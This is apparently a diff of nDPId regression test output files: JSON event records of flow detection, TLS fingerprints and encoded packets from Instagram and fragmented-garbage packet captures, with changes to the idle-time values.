00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265146,"flow_last_seen":1568796265146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265146,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1568796265146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265146,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDQAbvb0IW1AAAAALAC\/\/8u4wAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265147,"flow_last_seen":1568796265147,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265147,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1568796265147,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265147,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDRAbs6ii8aAAAAALAC\/\/8mxAAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2218,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1568796265158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265158,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNDH6s7\/29CFtqASbHAaPQAAAgQFeAQCCApocroGDXCenAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":3443,"packets-processed":3442,"total-skipped-flows":0,"total-l4-data-len":2699527,"total-not-detected-flows":1,"total-guessed-flows":12,"total-detected-flows":29,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":242,"global_ts_msec":1568796268061}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 3443/3442

232
test/results/ip_fragmented_garbage.pcap.out
View File

@@ -1,7 +1,7 @@
00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1534244024697}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244024697,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4mKigpKComXiUkI0AjJCUpOAAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244024697,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4mKigpKComXiUkI0AjJCUpOAAA"}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244024697}
